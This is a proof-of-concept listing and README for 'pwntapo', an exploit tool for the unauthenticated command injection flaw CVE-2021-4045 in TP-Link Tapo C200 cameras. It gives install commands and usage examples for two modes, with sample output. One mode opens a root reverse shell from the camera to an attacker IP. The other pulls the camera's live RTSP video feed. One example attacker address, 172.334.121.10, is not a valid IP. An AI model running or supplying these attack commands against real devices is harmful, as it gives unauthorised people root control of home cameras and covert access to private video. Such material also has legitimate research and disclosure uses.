POC details: 6f64748cd9cd59609afd6320c32c56e511288eab

Related vulnerability
Title: TP-Link Tapo C200 command injection vulnerability (CVE-2021-4045)
Description: TP-Link Tapo C200 is a network camera made by TP-Link (普联), a Chinese company. Firmware versions 1.1.15 and earlier of the TP-Link Tapo C200 network camera contain a security vulnerability: the uhttpd binary shipped in the firmware runs as root by default and does not filter or escape command arguments. An unauthenticated attacker can exploit this by sending a specially crafted command request to execute system commands on the device.
Description
🔐 "PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)" 🔓
Introduction
## TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE) (CVE-2021-4045)

Read about the exploit from [exploit db](https://www.exploit-db.com/exploits/51017)

This is a command injection vulnerability that affects all TP-Link Tapo C200 camera firmware versions < 1.1.16 Build 211209 Rel. 37726N. To read more about how the exploit works, see this article from [hacefresko](https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce).

## Installation
```shell
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
```
## Usage
```shell
python3 pwntapo.py -h

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]

PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)

options:
  -h, --help  show this help message and exit
  -M M        attack mode : shell | rtsp (default: None)
  -U U        RTSP_USER (default: None)
  -P P        RTSP_PASSWORD (default: None)
  -C C        RTSP_CIPHERTEXT (default: None)
  -H H        victim ip address (default: None)
  -A A        attacker ip address (default: None)
  -p P        Listening port (default: None)
  -v          increase output verbosity (default: False)
```

The exploit has two modes, SHELL and RTSP.

## SHELL
In shell mode you only need to provide the victim IP, the attacker IP and the listening port; this spawns a root shell on the device.
```shell
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Listening on port 1887...
[+] Sending reverse shell to 192.168.110.121...

Listening on 0.0.0.0 1887
```
## RTSP
In RTSP mode you also need to provide RTSP_USER, RTSP_PASSWORD and RTSP_CIPHERTEXT to be able to get live footage from the camera.
```shell
python3 pwntapo.py -M rtsp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=

============================================================================================
    @Pl4inT3XT
   _______      ________    ___   ___ ___  __        _  _    ___  _  _   _____ 
  / ____\ \    / /  ____|  |__ \ / _ \__ \/_ |      | || |  / _ \| || | | ____|
 | |     \ \  / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__  
 | |      \ \/ / |  __|______/ /| | | |/ / | |______|__   _| | | |__   _|___ \ 
 | |____   \  /  | |____    / /_| |_| / /_ | |         | | | |_| |  | |  ___) |
  \_____|   \/   |______|  |____|\___/____||_|         |_|  \___/   |_| |____/
  
============================================================================================  

[+] Setting up RTSP video stream...
```
## CAUTION DO NOT RUN THE TOOL ON DEVICES WITHOUT USER PERMISSION
File snapshot

```
[4.0K] /data/pocs/6f64748cd9cd59609afd6320c32c56e511288eab
├── [4.2K] pwntapo.py
├── [4.2K] README.md
└── [ 48] requirements.txt

0 directories, 3 files
```